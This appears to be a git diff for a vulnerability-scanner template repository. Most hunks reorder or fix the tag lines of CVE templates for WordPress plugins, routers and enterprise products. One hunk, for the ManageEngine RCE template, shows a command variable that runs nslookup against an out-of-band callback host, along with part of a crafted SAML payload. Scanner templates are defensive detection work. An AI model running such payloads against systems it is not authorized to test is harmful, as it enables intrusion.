+ tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml
index 7b35992def..a984375a5b 100644
--- a/http/cves/2022/CVE-2022-3506.yaml
+++ b/http/cves/2022/CVE-2022-3506.yaml
@@ -29,7 +29,7 @@ info:
vendor: never5
product: related_posts
framework: wordpress
- tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr,never5
+ tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml
index a2d4c2bd88..7bf8b344e5 100644
--- a/http/cves/2022/CVE-2022-3578.yaml
+++ b/http/cves/2022/CVE-2022-3578.yaml
@@ -28,7 +28,7 @@ info:
vendor: metagauss
product: profilegrid
framework: wordpress
- tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022,metagauss
+ tags: cve,cve2022,wp-plugin,wordpress,wpscan,wp,xss,profilegrid,authenticated,metagauss
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml
index 0f17a23741..b56bf5c898 100644
--- a/http/cves/2022/CVE-2022-36446.yaml
+++ b/http/cves/2022/CVE-2022-36446.yaml
@@ -29,7 +29,7 @@ info:
vendor: webmin
product: webmin
shodan-query: title:"Webmin"
- tags: packetstorm,cve2022,webmin,rce,authenticated,edb,cve
+ tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml
index 8f82a7c843..96ce96a0b6 100644
--- a/http/cves/2022/CVE-2022-36553.yaml
+++ b/http/cves/2022/CVE-2022-36553.yaml
@@ -27,7 +27,7 @@ info:
product: hwl-2511-ss_firmware
fofa-query: title="index" && header="lighttpd/1.4.30"
zoomeye-query: app:"Hytec Inter HWL-2511-SS"
- tags: cve,cve2022,hytec,rce
+ tags: cve2022,cve,hytec,rce
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml
index 6895da32f7..bafedc5e65 100644
--- a/http/cves/2022/CVE-2022-36642.yaml
+++ b/http/cves/2022/CVE-2022-36642.yaml
@@ -29,7 +29,7 @@ info:
vendor: telosalliance
product: omnia_mpx_node_firmware
shodan-query: http.title:"Omnia MPX Node | Login"
- tags: traversal,omnia,edb,cve,cve2022,lfi,telosalliance
+ tags: cve,cve2022,traversal,omnia,edb,lfi,telosalliance
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml
index 7ebf539d20..9161fa74a1 100644
--- a/http/cves/2022/CVE-2022-36804.yaml
+++ b/http/cves/2022/CVE-2022-36804.yaml
@@ -29,7 +29,7 @@ info:
vendor: atlassian
product: bitbucket
shodan-query: http.component:"BitBucket"
- tags: packetstorm,cve,cve2022,bitbucket,atlassian,kev
+ tags: cve,cve2022,packetstorm,bitbucket,atlassian,kev
variables:
data: '{{rand_base(5)}}'
diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml
index 83aa73fa1b..20ec64c480 100644
--- a/http/cves/2022/CVE-2022-37190.yaml
+++ b/http/cves/2022/CVE-2022-37190.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: cuppacms
product: cuppacms
- tags: cve,cve2022,rce,cuppa,authenticated,cuppacms
+ tags: cve2022,cve,rce,cuppa,authenticated,cuppacms
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml
index b8dab50da9..848f14d862 100644
--- a/http/cves/2022/CVE-2022-3768.yaml
+++ b/http/cves/2022/CVE-2022-3768.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpsmartcontracts
product: wpsmartcontracts
framework: wordpress
- tags: wp-smart-contracts,wpscan,cve,wp-plugin,sqli,wordpress,cve2022,wp,authenticated,wpsmartcontracts
+ tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml
index 3f84cd21c4..7ac7885bae 100644
--- a/http/cves/2022/CVE-2022-3800.yaml
+++ b/http/cves/2022/CVE-2022-3800.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: ibax
product: go-ibax
- tags: cve,cve2022,ibax,go-ibax,sqli
+ tags: cve2022,cve,ibax,go-ibax,sqli
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml
index ae4db84d9a..026a852761 100644
--- a/http/cves/2022/CVE-2022-38295.yaml
+++ b/http/cves/2022/CVE-2022-38295.yaml
@@ -26,7 +26,7 @@ info:
max-request: 3
vendor: cuppacms
product: cuppacms
- tags: cve,cve2022,xss,cuppa,authenticated,cuppacms
+ tags: cve2022,cve,xss,cuppa,authenticated,cuppacms
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml
index f8f9cea046..3b1d846c4b 100644
--- a/http/cves/2022/CVE-2022-38467.yaml
+++ b/http/cves/2022/CVE-2022-38467.yaml
@@ -28,7 +28,7 @@ info:
vendor: crmperks
product: crm_perks_forms
framework: wordpress
- tags: crm-perks-forms,wpscan,cve,cve2022,wordpress,wp,wp-plugin,xss,crmperks
+ tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml
index 372770ab9f..1ed9ee257f 100644
--- a/http/cves/2022/CVE-2022-38553.yaml
+++ b/http/cves/2022/CVE-2022-38553.yaml
@@ -30,7 +30,7 @@ info:
vendor: creativeitem
product: academy_learning_management_system
google-query: intext:"Study any topic, anytime"
- tags: cve,cve2022,academylms,xss,creativeitem
+ tags: cve2022,cve,academylms,xss,creativeitem
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml
index 488eea58d0..a764ef9b09 100644
--- a/http/cves/2022/CVE-2022-3908.yaml
+++ b/http/cves/2022/CVE-2022-3908.yaml
@@ -27,7 +27,7 @@ info:
vendor: helloprint
product: helloprint
framework: wordpress
- tags: xss,wordpress,wp-plugin,helloprint,cve,cve2022,wp,authenticated,wpscan
+ tags: cve,cve2022,xss,wordpress,wp-plugin,helloprint,wp,authenticated,wpscan
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml
index 989555ad3f..78695d92fc 100644
--- a/http/cves/2022/CVE-2022-3933.yaml
+++ b/http/cves/2022/CVE-2022-3933.yaml
@@ -27,7 +27,7 @@ info:
vendor: g5theme
product: essential_real_estate
framework: wordpress
- tags: wpscan,cve2022,authenticated,wordpress,wp-plugin,wp,essential-real-estate,cve,xss,g5theme
+ tags: cve,cve2022,wpscan,authenticated,wordpress,wp-plugin,wp,essential-real-estate,xss,g5theme
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml
index 4bb79ea4bf..4bd7a738fe 100644
--- a/http/cves/2022/CVE-2022-3934.yaml
+++ b/http/cves/2022/CVE-2022-3934.yaml
@@ -26,7 +26,7 @@ info:
vendor: mehanoid
product: flat_pm
framework: wordpress
- tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin,mehanoid
+ tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml
index 12603a4627..7d0e6d8a9b 100644
--- a/http/cves/2022/CVE-2022-39952.yaml
+++ b/http/cves/2022/CVE-2022-39952.yaml
@@ -28,7 +28,7 @@ info:
vendor: fortinet
product: fortinac
shodan-query: title:"FortiNAC"
- tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive
+ tags: cve,cve2022,fortinet,fortinac,fileupload,rce,intrusive
variables:
boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml
index 51f425e9b2..1e83f836cf 100644
--- a/http/cves/2022/CVE-2022-39986.yaml
+++ b/http/cves/2022/CVE-2022-39986.yaml
@@ -30,7 +30,7 @@ info:
vendor: raspap
product: raspap
shodan-query: http.favicon.hash:-1465760059
- tags: packetstorm,cve,cve2020,raspap,rce
+ tags: cve,cve2022,packetstorm,raspap,rce
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml
index f96446e4c5..97a7cbc403 100644
--- a/http/cves/2022/CVE-2022-40022.yaml
+++ b/http/cves/2022/CVE-2022-40022.yaml
@@ -30,7 +30,7 @@ info:
vendor: microchip
product: syncserver_s650_firmware
shodan-query: html:"Symmetricom SyncServer"
- tags: packetstorm,cve,cve2022,syncserver,rce,unauth,microchip
+ tags: cve,cve2022,packetstorm,syncserver,rce,unauth,microchip
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml
index 559a241320..154a58cc81 100644
--- a/http/cves/2022/CVE-2022-40032.yaml
+++ b/http/cves/2022/CVE-2022-40032.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: simple_task_managing_system_project
product: simple_task_managing_system
- tags: packetstorm,cve,cve2022,simple-task,stms,sqli,simple_task_managing_system_project
+ tags: cve,cve2022,packetstorm,simple-task,stms,sqli,simple_task_managing_system_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml
index 9fa066b1d3..1dca33a26f 100644
--- a/http/cves/2022/CVE-2022-4050.yaml
+++ b/http/cves/2022/CVE-2022-4050.yaml
@@ -28,7 +28,7 @@ info:
vendor: beardev
product: joomsport
framework: wordpress
- tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev
+ tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml
index e1b9879d2d..e70b349510 100644
--- a/http/cves/2022/CVE-2022-4057.yaml
+++ b/http/cves/2022/CVE-2022-4057.yaml
@@ -29,7 +29,7 @@ info:
product: autooptimize
framework: wordpress
publicwww-query: /wp-content/plugins/autoptimize
- tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters
+ tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml
index 7ff0a7e98f..2e1b1d29c8 100644
--- a/http/cves/2022/CVE-2022-4060.yaml
+++ b/http/cves/2022/CVE-2022-4060.yaml
@@ -28,7 +28,7 @@ info:
vendor: odude
product: user_post_gallery
framework: wordpress
- tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg,odude
+ tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml
index 29205bf34b..da05543e3d 100644
--- a/http/cves/2022/CVE-2022-4063.yaml
+++ b/http/cves/2022/CVE-2022-4063.yaml
@@ -27,7 +27,7 @@ info:
vendor: pluginus
product: inpost_gallery
framework: wordpress
- tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan,pluginus
+ tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml
index f056628912..0315bbe6cf 100644
--- a/http/cves/2022/CVE-2022-40843.yaml
+++ b/http/cves/2022/CVE-2022-40843.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: tenda
product: w15e_firmware
- tags: cve,cve2022,tenda,auth-bypass,router,iot
+ tags: cve2022,cve,tenda,auth-bypass,router,iot
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml
index c596ac628d..4504bd1093 100644
--- a/http/cves/2022/CVE-2022-4140.yaml
+++ b/http/cves/2022/CVE-2022-4140.yaml
@@ -27,7 +27,7 @@ info:
vendor: collne
product: welcart_e-commerce
framework: wordpress
- tags: usc-e-shop,wpscan,cve,cve2022,wp-plugin,wp,wordpress,lfi,unauthenticated,collne
+ tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml
index 092a28a638..57b2ce56cd 100644
--- a/http/cves/2022/CVE-2022-41441.yaml
+++ b/http/cves/2022/CVE-2022-41441.yaml
@@ -30,7 +30,7 @@ info:
vendor: reqlogic
product: reqlogic
shodan-query: http.html:"ReQlogic"
- tags: packetstorm,cve,cve2022,xss,reqlogic
+ tags: cve,cve2022,packetstorm,xss,reqlogic
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml
index 20c2990a2f..4eebd8f6a4 100644
--- a/http/cves/2022/CVE-2022-41840.yaml
+++ b/http/cves/2022/CVE-2022-41840.yaml
@@ -29,7 +29,7 @@ info:
vendor: collne
product: welcart_e-commerce
framework: wordpress
- tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne
+ tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml
index e9ba3aa0d2..5665d1380d 100644
--- a/http/cves/2022/CVE-2022-42095.yaml
+++ b/http/cves/2022/CVE-2022-42095.yaml
@@ -28,7 +28,7 @@ info:
max-request: 5
vendor: backdropcms
product: backdrop_cms
- tags: cve,cve2022,xss,cms,backdrop,authenticated,backdropcms
+ tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml
index 9bfac3a914..11d9f3a953 100644
--- a/http/cves/2022/CVE-2022-4260.yaml
+++ b/http/cves/2022/CVE-2022-4260.yaml
@@ -27,7 +27,7 @@ info:
vendor: wp-ban_project
product: wp-ban
framework: wordpress
- tags: cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,cve,wp-ban,wp-ban_project
+ tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml
index 45b06f22e4..9dcb4b3bff 100644
--- a/http/cves/2022/CVE-2022-4295.yaml
+++ b/http/cves/2022/CVE-2022-4295.yaml
@@ -28,7 +28,7 @@ info:
product: show_all_comments
framework: wordpress
publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
- tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty
+ tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml
index 910235349c..73d94ff8cf 100644
--- a/http/cves/2022/CVE-2022-4301.yaml
+++ b/http/cves/2022/CVE-2022-4301.yaml
@@ -26,7 +26,7 @@ info:
vendor: sunshinephotocart
product: sunshine_photo_cart
framework: wordpress
- tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart
+ tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml
index 162ab2f9b0..74b02894bf 100644
--- a/http/cves/2022/CVE-2022-43014.yaml
+++ b/http/cves/2022/CVE-2022-43014.yaml
@@ -27,7 +27,7 @@ info:
vendor: opencats
product: opencats
shodan-query: title:"OpenCATS"
- tags: cve,cve2022,xss,opencats,authenticated
+ tags: cve2022,cve,xss,opencats,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml
index 0fcbe81faf..edb4db0a6f 100644
--- a/http/cves/2022/CVE-2022-43016.yaml
+++ b/http/cves/2022/CVE-2022-43016.yaml
@@ -27,7 +27,7 @@ info:
vendor: opencats
product: opencats
shodan-query: title:"OpenCATS"
- tags: cve,cve2022,xss,opencats,authenticated
+ tags: cve2022,cve,xss,opencats,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml
index 0df0bdf39f..6e8acad786 100644
--- a/http/cves/2022/CVE-2022-43140.yaml
+++ b/http/cves/2022/CVE-2022-43140.yaml
@@ -28,7 +28,7 @@ info:
product: kkfileview
shodan-query: http.html:"kkFileView"
fofa-query: app="kkFileView"
- tags: cve,cve2022,ssrf,kkFileview,keking
+ tags: cve2022,cve,ssrf,kkFileview,keking
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml
index 2c29ee8b27..a3d2d20fe5 100644
--- a/http/cves/2022/CVE-2022-4320.yaml
+++ b/http/cves/2022/CVE-2022-4320.yaml
@@ -26,7 +26,7 @@ info:
vendor: mhsoftware
product: wordpress_events_calendar_plugin
framework: wordpress
- tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan,mhsoftware
+ tags: cve,cve2022,calendar,event,xss,wordpress,wp,wp-plugin,wpscan,mhsoftware
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml
index f88c6359e9..02f0dfc42b 100644
--- a/http/cves/2022/CVE-2022-4325.yaml
+++ b/http/cves/2022/CVE-2022-4325.yaml
@@ -27,7 +27,7 @@ info:
vendor: ifeelweb
product: post_status_notifier_lite
framework: wordpress
- tags: wp,wordpress,wpscan,authenticated,cve,cve2022,xss,wp-plugin,post-status-notifier-lite,ifeelweb
+ tags: cve,cve2022,wp,wordpress,wpscan,authenticated,xss,wp-plugin,post-status-notifier-lite,ifeelweb
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
index 348ad4aab5..701dcc929f 100644
--- a/http/cves/2022/CVE-2022-4328.yaml
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -25,7 +25,7 @@ info:
vendor: najeebmedia
product: woocommerce_checkout_field_manager
framework: wordpress
- tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive,najeebmedia
+ tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml
index d131bc2e8c..c5dfb0c2e7 100644
--- a/http/cves/2022/CVE-2022-43769.yaml
+++ b/http/cves/2022/CVE-2022-43769.yaml
@@ -27,7 +27,7 @@ info:
vendor: hitachi
product: vantara_pentaho_business_analytics_server
shodan-query: http.favicon.hash:1749354953
- tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev,hitachi
+ tags: cve,cve2022,packetstorm,rce,ssti,pentaho,kev,hitachi
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml
index 92768c42fa..064644ff2e 100644
--- a/http/cves/2022/CVE-2022-4447.yaml
+++ b/http/cves/2022/CVE-2022-4447.yaml
@@ -28,7 +28,7 @@ info:
vendor: fontsy_project
product: fontsy
framework: wordpress
- tags: cve,wordpress,wp,wpscan,cve2022,wp-plugin,sqli,fontsy,unauth,fontsy_project
+ tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project
variables:
num: "999999999"
diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml
index 1ea4d7fc78..d3c52e1cf6 100644
--- a/http/cves/2022/CVE-2022-44877.yaml
+++ b/http/cves/2022/CVE-2022-44877.yaml
@@ -30,7 +30,7 @@ info:
vendor: control-webpanel
product: webpanel
shodan-query: http.title:"Login | Control WebPanel"
- tags: packetstorm,cve,cve2022,centos,rce,kev,control-webpanel
+ tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml
index d053e1a159..c9585e6005 100644
--- a/http/cves/2022/CVE-2022-44944.yaml
+++ b/http/cves/2022/CVE-2022-44944.yaml
@@ -29,7 +29,7 @@ info:
vendor: rukovoditel
product: rukovoditel
shodan-query: http.favicon.hash:-1499940355
- tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
+ tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml
index 3805a9edd6..5fca2d7237 100644
--- a/http/cves/2022/CVE-2022-44947.yaml
+++ b/http/cves/2022/CVE-2022-44947.yaml
@@ -29,7 +29,7 @@ info:
vendor: rukovoditel
product: rukovoditel
shodan-query: http.favicon.hash:-1499940355
- tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated
+ tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml
index ab189775cd..b636300871 100644
--- a/http/cves/2022/CVE-2022-45038.yaml
+++ b/http/cves/2022/CVE-2022-45038.yaml
@@ -27,7 +27,7 @@ info:
max-request: 5
vendor: wbce
product: wbce_cms
- tags: cve,cve2022,xss,wbce,cms,authenticated
+ tags: cve2022,cve,xss,wbce,cms,authenticated
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml
index a2ea276e6e..cdfba01e88 100644
--- a/http/cves/2022/CVE-2022-45354.yaml
+++ b/http/cves/2022/CVE-2022-45354.yaml
@@ -17,7 +17,7 @@ info:
verified: true
max-request: 1
shodan-query: html:"/wp-content/plugins/download-monitor/"
- tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp
+ tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml
index e86824f695..088211ea50 100644
--- a/http/cves/2022/CVE-2022-45365.yaml
+++ b/http/cves/2022/CVE-2022-45365.yaml
@@ -21,7 +21,7 @@ info:
verified: "true"
max-request: 1
publicwww-query: "/wp-content/plugins/stock-ticker/"
- tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
+ tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml
index 61f14b9e91..f6fb722e3e 100644
--- a/http/cves/2022/CVE-2022-45917.yaml
+++ b/http/cves/2022/CVE-2022-45917.yaml
@@ -30,7 +30,7 @@ info:
vendor: ilias
product: ilias
shodan-query: http.html:"ILIAS"
- tags: redirect,packetstorm,seclists,cve,cve2022,ilias
+ tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml
index a3250b1e22..cc3dd341eb 100644
--- a/http/cves/2022/CVE-2022-46073.yaml
+++ b/http/cves/2022/CVE-2022-46073.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: helmet_store_showroom_project
product: helmet_store_showroom
- tags: cve,cve2022,xss,helmet-store-showroom,helmet_store_showroom_project
+ tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml
index f3ad1842b8..23782b6988 100644
--- a/http/cves/2022/CVE-2022-46934.yaml
+++ b/http/cves/2022/CVE-2022-46934.yaml
@@ -27,7 +27,7 @@ info:
vendor: keking
product: kkfileview
shodan-query: http.html:"kkFileView"
- tags: xss,cve,cve2022,kkfileview,keking
+ tags: cve,cve2022,xss,kkfileview,keking
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml
index fef0725cb1..aaae75b63a 100644
--- a/http/cves/2022/CVE-2022-47075.yaml
+++ b/http/cves/2022/CVE-2022-47075.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: smartofficepayroll
product: smartoffice
- tags: packetstorm,cve,cve2022,smart-office,info,exposure,smartofficepayroll
+ tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml
index ac5361b481..d26d663987 100644
--- a/http/cves/2022/CVE-2022-47966.yaml
+++ b/http/cves/2022/CVE-2022-47966.yaml
@@ -29,7 +29,7 @@ info:
vendor: zohocorp
product: manageengine_access_manager_plus
shodan-query: title:"ManageEngine"
- tags: packetstorm,cve,cve2022,rce,zoho,manageengine,oast,kev,zohocorp
+ tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp
variables:
cmd: 'nslookup {{interactsh-url}}'
SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==
diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml
index 424b32df15..08dc50d5b9 100644
--- a/http/cves/2022/CVE-2022-48165.yaml
+++ b/http/cves/2022/CVE-2022-48165.yaml
@@ -30,7 +30,7 @@ info:
vendor: wavlink
product: wl-wn530h4_firmware
shodan-query: http.favicon.hash:-1350437236
- tags: cve,cve2022,wavlink,router,exposure
+ tags: cve2022,cve,wavlink,router,exposure
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml
index c54b2c8245..9eeb94df6a 100644
--- a/http/cves/2022/CVE-2022-48197.yaml
+++ b/http/cves/2022/CVE-2022-48197.yaml
@@ -27,7 +27,7 @@ info:
vendor: yui_project
product: yui
shodan-query: html:"bower_components/yui2/"
- tags: packetstorm,yui2,cve,cve2022,xss,yahoo,treeview,yui_project
+ tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml
index 9d9fbead8e..0568682a7e 100644
--- a/http/cves/2023/CVE-2023-0099.yaml
+++ b/http/cves/2023/CVE-2023-0099.yaml
@@ -27,7 +27,7 @@ info:
vendor: getlasso
product: simple_urls
framework: wordpress
- tags: xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,cve,cve2023,getlasso
+ tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso
http:
- raw:
diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml
index 9f0deb6cbf..1a940ead34 100644
--- a/http/cves/2023/CVE-2023-0126.yaml
+++ b/http/cves/2023/CVE-2023-0126.yaml
@@ -28,7 +28,7 @@ info:
vendor: sonicwall
product: sma1000_firmware
shodan-query: title:"Appliance Management Console Login"
- tags: cve,cve2023,sonicwall,lfi,sma1000
+ tags: cve2023,cve,sonicwall,lfi,sma1000
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml
index 63e29101b0..7f59e9308d 100644
--- a/http/cves/2023/CVE-2023-0236.yaml
+++ b/http/cves/2023/CVE-2023-0236.yaml
@@ -26,7 +26,7 @@ info:
vendor: themeum
product: tutor_lms
